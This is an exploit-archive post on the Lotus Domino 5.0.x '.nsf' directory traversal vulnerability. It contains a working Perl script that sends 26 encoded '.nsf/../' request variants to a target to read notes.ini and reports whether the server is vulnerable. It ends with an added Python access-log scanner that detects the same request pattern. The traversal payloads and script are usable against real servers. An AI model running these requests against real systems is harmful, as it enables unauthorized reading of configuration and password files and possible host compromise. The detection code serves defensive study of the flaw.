DarkLegion

Lotus Domino Server 5.0.x Directory Traversal Vulnerability

It is possible for a remote user to gain access to any known file residing on the Lotus Domino Server 5.0.6 and previous. A specially crafted HTTP request comprised of '.nsf' and '../' along with the known filename, will display the contents of the particular file with read permissions.

Successful exploitation of this vulnerability could enable a remote user to gain access to system files, password files, etc. This could lead to a complete compromise of the host.

#!/usr/bin/perl
# PERL script to test a Domino server for directory
# traversal vulnerability. (BugTraq ID 2173,
# Lotus Domino Server Directory Traversal Vulnerability)
#
# Michael Smith, www.netlocksmith.com
# 01/15/2001
#
# Credit & thanks to all of these folks:
#
# - To Georgi Guninski, georgi,
#   who discovered the original vulnerability,
#   and Ralph Moonen of KPMG, who found additional
#   URL variations
#
# - Roelof Temmingh, SensePost - SensePost Information Security,
#   author of unicodecheck.pl, on which this
#   script is based
#
# - Rain Forest Puppy, www.wiretrip.com,
#   author of Sendraw routine
#
use Socket;

# --------------init
if ($#ARGV<0) {die "Usage: nsfcheck targetIP[:port]\n";}

# Split the argument into host and optional port (default 80).
($host,$port)=split(/:/,$ARGV[0]);
if (!defined($port) || $port eq "") {$port=80;}

print "Testing $host:$port\n";
$target = inet_aton($host) or die("Can't resolve $host\n");
$flag = 0;

# Known URL variations that reach notes.ini through a '.nsf' segment.
@notesvuln=( "/%00%00.nsf/../lotus/domino/notes.ini",
    "/%00%20.nsf/../lotus/domino/notes.ini",
    "/%00%c0%af.nsf/../lotus/domino/notes.ini",
    "/%00...nsf/../lotus/domino/notes.ini",
    "/%00.nsf//../lotus/domino/notes.ini",
    "/%00.nsf/../lotus/domino/notes.ini",
    "/%00.nsf/..//lotus/domino/notes.ini",
    "/%00.nsf/../../lotus/domino/notes.ini",
    "/%00.nsf.nsf/../lotus/domino/notes.ini",
    "/%20%00.nsf/../lotus/domino/notes.ini",
    "/%20.nsf//../lotus/domino/notes.ini",
    "/%20.nsf/..//lotus/domino/notes.ini",
    "/%c0%af%00.nsf/../lotus/domino/notes.ini",
    "/%c0%af.nsf//../lotus/domino/notes.ini",
    "/%c0%af.nsf/..//lotus/domino/notes.ini",
    "/...nsf//../lotus/domino/notes.ini",
    "/...nsf/..//lotus/domino/notes.ini",
    "/.nsf///../lotus/domino/notes.ini",
    "/.nsf//../lotus/domino/notes.ini",
    "/.nsf//..//lotus/domino/notes.ini",
    "/.nsf/../lotus/domino/notes.ini",
    "/.nsf/../lotus/domino/notes.ini",
    "/.nsf/..///lotus/domino/notes.ini",
    "/.nsf%00.nsf/../lotus/domino/notes.ini",
    "/.nsf.nsf//../lotus/domino/notes.ini",
    "/.nsf.nsf/..//lotus/domino/notes.ini");

# ----- Test each possible version of vulnerability -----
foreach $notespath (@notesvuln) {
    my @results=sendraw("GET ".$notespath." HTTP/1.0\r\n\r\n");
    foreach $line (@results){
        # notes.ini starts with a [Notes] section header.
        if ($line =~ /\[Notes\]/) {$flag=1;}
    }
}

if ($flag==0) {die("No vulnerability found at this address.\n");}
else {die("This site is vulnerable.\n");}

# ------------- Sendraw
# Send a raw request string to $target:$port and return the response lines.
sub sendraw {
    my ($pstr)=@_;
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
        die("Socket problems\n");
    # sockaddr_in() builds the address portably instead of a hand-packed struct.
    if(connect(S,sockaddr_in($port,$target))){
        my @in;
        select(S); $|=1; print $pstr;
        while(<S>){ push @in, $_;}
        select(STDOUT); close(S); return @in;
    } else { die("Can't connect...\n"); }
}
# ----------------------

Source
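A log-side check for the request shape described in this post, as an added example that is not part of the original post or of the script author's code: it percent-decodes each request path from a web access log and flags a path segment ending in `.nsf` that is followed by a `..` segment. The Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration, and the handling of percent-encoded dots goes beyond the variants listed in the script.

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed log layout: Common Log Format, 'client - - [time] "METHOD target PROTO" status size'.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(?:[A-Z]+) (\S+)[^"]*" (\d{3})')
# A path segment ending in .nsf, then one or more slashes, then a ".." segment.
NSF_TRAVERSAL = re.compile(rb'\.nsf[/\\]+\.\.(?:[/\\]|$)', re.IGNORECASE)


def normalise(target: str) -> bytes:
    """Percent-decode the path repeatedly (bounded) so encoded dots and slashes are visible."""
    path = target.split("?", 1)[0].encode("latin-1", "replace")
    for _ in range(3):  # bounded loop, also catches double encoding
        decoded = unquote_to_bytes(path).replace(b"\xc0\xaf", b"/")  # overlong "/"
        if decoded == path:
            break
        path = decoded
    return path


def is_nsf_traversal(target: str) -> bool:
    return NSF_TRAVERSAL.search(normalise(target)) is not None


def scan(lines):
    """Return (client, target, status) for every request that matches."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if m and is_nsf_traversal(m.group(2)):
            hits.append((m.group(1), m.group(2), int(m.group(3))))
    return hits


# Constructed sample access-log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Jan/2001:10:00:01 +0000] "GET /names.nsf/People?OpenView HTTP/1.0" 200 5120',
    '198.51.100.7 - - [15/Jan/2001:10:00:02 +0000] "GET /.nsf/../lotus/domino/notes.ini HTTP/1.0" 200 2048',
    '198.51.100.7 - - [15/Jan/2001:10:00:03 +0000] "GET /%00%c0%af.nsf//../lotus/domino/notes.ini HTTP/1.0" 404 210',
    '198.51.100.7 - - [15/Jan/2001:10:00:04 +0000] "GET /a.nsf/%252e%252e/lotus/domino/notes.ini HTTP/1.0" 404 210',
    '192.0.2.11 - - [15/Jan/2001:10:00:05 +0000] "GET /help/../index.html HTTP/1.0" 200 900',
]

if __name__ == "__main__":
    for client, target, status in scan(SAMPLE_LOG):
        # A match answered with status 200 deserves a closer look at what was served.
        print(f"{client} {status} {target}")
```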
